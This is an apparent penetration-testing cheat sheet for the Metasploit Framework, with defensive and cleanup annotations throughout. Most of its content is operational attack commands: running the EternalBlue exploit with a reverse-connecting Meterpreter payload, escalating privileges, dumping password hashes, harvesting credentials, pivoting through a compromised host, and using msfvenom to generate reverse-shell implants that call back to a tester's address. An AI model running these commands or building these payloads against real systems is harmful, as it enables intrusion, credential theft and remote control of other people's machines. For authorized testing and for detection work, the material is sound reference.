⚠️ Pracivo Security Lab — Post-exploitation techniques for authorized penetration testing. Persistence, exfiltration, pivoting, LOLBins, C2 frameworks.
> Metasploit Framework Guide
EXPLOITATION FRAMEWORK
# STARTING METASPLOIT
# Both forms are run from the OS shell and open the interactive msf console.
msfconsole
msfconsole -q # quiet mode (no banner)
# DATABASE SETUP
# msfdb is a separate OS-shell helper, not a console command: run it before
# launching msfconsole. db_status is typed inside the console afterwards.
# The database accumulates hosts, services, credentials and loot from the
# engagement, so it needs the same handling as any other sensitive client data.
msfdb init # initialise the framework's PostgreSQL database
db_status # verify connected
# BASIC WORKFLOW
# Typed at the msf console prompt. All addresses and ports are sample values.
search eternalblue # search for exploits
# Selects the MS17-010 exploit, which targets the SMBv1 service on TCP 445.
# It is a kernel-level exploit: an unsuccessful attempt is known to be able to
# crash (blue-screen) the target, so stability-sensitive hosts should be
# agreed in scope first. Patch state can be confirmed without exploitation
# using auxiliary/scanner/smb/smb_ms17_010.
# Defence: apply the MS17-010 update, disable SMBv1, restrict access to 445.
use exploit/windows/smb/ms17_010_eternalblue
show options # see required parameters
# RHOSTS = target(s); LHOST/LPORT = address and port on the testing machine
# that the payload connects back to (must be reachable from the target).
set RHOSTS 192.168.1.10
set LHOST 10.10.10.1
# 4444 is the framework's default port; outbound connections to it from a
# server are a well-known detection signal.
set LPORT 4444
# Staged 64-bit Meterpreter: a small stager connects back and pulls the rest.
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run # or exploit
# SCANNING
# TCP port scan of a sample /24 from the msf console. The listed ports are
# the usual FTP, SSH, HTTP, HTTPS, SMB and RDP services.
# A sweep like this produces a burst of connections from one source to many
# hosts, which is visible in firewall, netflow and IDS logs; keep RHOSTS
# limited to the ranges named in the rules of engagement.
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 21,22,80,443,445,3389
run
# METERPRETER COMMANDS (after exploitation)
# Typed at the meterpreter prompt of an open session, except the two
# `sessions` commands at the end, which belong to the msf console.
sysinfo # system info
getuid # current user
# getsystem normally needs local administrator rights already. Depending on
# the technique used it installs a temporary service or named pipe, which
# appears in service-installation logs (System event 7045).
getsystem # try privilege escalation
# Returns local-account NTLM hashes and needs SYSTEM privileges.
# NOTE(review): the built-in command is understood to work through LSASS,
# which makes it a common EDR trigger - confirm for the version in use.
# Dumped hashes are credentials: store and report them as such.
hashdump # dump SAM hashes
ps # list processes
# 1234 is a placeholder; take the PID from `ps`. Migration is cross-process
# injection, visible to EDR and Sysmon (events 8 and 10), and a failed
# migration can end the session or destabilise the target process.
migrate 1234 # migrate to process ID 1234
# upload: testing machine -> target. download: target -> testing machine.
# Keep a list of every file written to the target so it can be removed and
# reported at the end of the engagement.
upload file.exe # upload file
download file.exe # download file
# Spawns a command interpreter as a child process on the target, which
# process-creation logging records.
shell # drop to system shell
background # background session
# msf console commands (available once the session is backgrounded):
sessions -l # list all sessions
sessions -i 1 # interact with session 1
# POST EXPLOITATION MODULES
# Run from the meterpreter prompt of the session they should act on.
# Harvests credentials found on the host into the framework database.
run post/windows/gather/credentials/credential_collector
# Lists local privilege-escalation modules that may apply to this host. For
# defenders the output is in effect a list of missing local patches.
run post/multi/recon/local_exploit_suggester
# Changes target configuration (turns on Remote Desktop). This widens the
# host's attack surface until reverted, so record the change and undo it
# during cleanup. NOTE(review): the module is understood to print a cleanup
# resource file on completion - confirm and keep it.
run post/windows/manage/enable_rdp
# Adds routes through this session to the framework's routing table so other
# modules can reach subnets behind the host. Traffic then originates from the
# compromised host, which is why internal segmentation and east-west
# monitoring matter.
run post/multi/manage/autoroute
# Post-module counterpart of the built-in `hashdump` command; the same
# SYSTEM requirement and credential-handling rules apply.
run post/windows/gather/hashdump
# GENERATE PAYLOADS (msfvenom)
# Run from the OS shell. -p = payload, LHOST/LPORT = callback address and
# port baked into the payload, -f = output format, -o = output file.
# Each generated file is a live implant that connects to LHOST:LPORT when
# executed: keep an inventory of where copies are placed and remove them
# after testing. Unmodified msfvenom output is widely signatured by
# endpoint protection, which makes it a useful baseline for detection tests.
# Staged 64-bit Windows Meterpreter as a PE executable.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f exe -o payload.exe
# Staged 64-bit Linux Meterpreter as an ELF binary.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f elf -o payload
# Stageless plain command shell (not Meterpreter). With no -o the result is
# printed to stdout; the powershell format emits the shellcode as a
# PowerShell byte-array definition.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f powershell
# HANDLER (catch reverse shells)
# Typed at the msf console prompt. PAYLOAD and LPORT must match the values
# the payload was generated with; as written this matches only the first
# msfvenom example above (windows/x64/meterpreter/reverse_tcp on 4444).
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# 0.0.0.0 listens on every interface of the testing machine, including any
# that face networks outside the engagement. Setting the address of the
# engagement-facing interface instead narrows that exposure.
set LHOST 0.0.0.0
set LPORT 4444
# -j starts the listener as a background job. `jobs` lists running jobs and
# `jobs -k <id>` stops one; stop the listener when testing ends so no port
# is left open.
run -j # run in background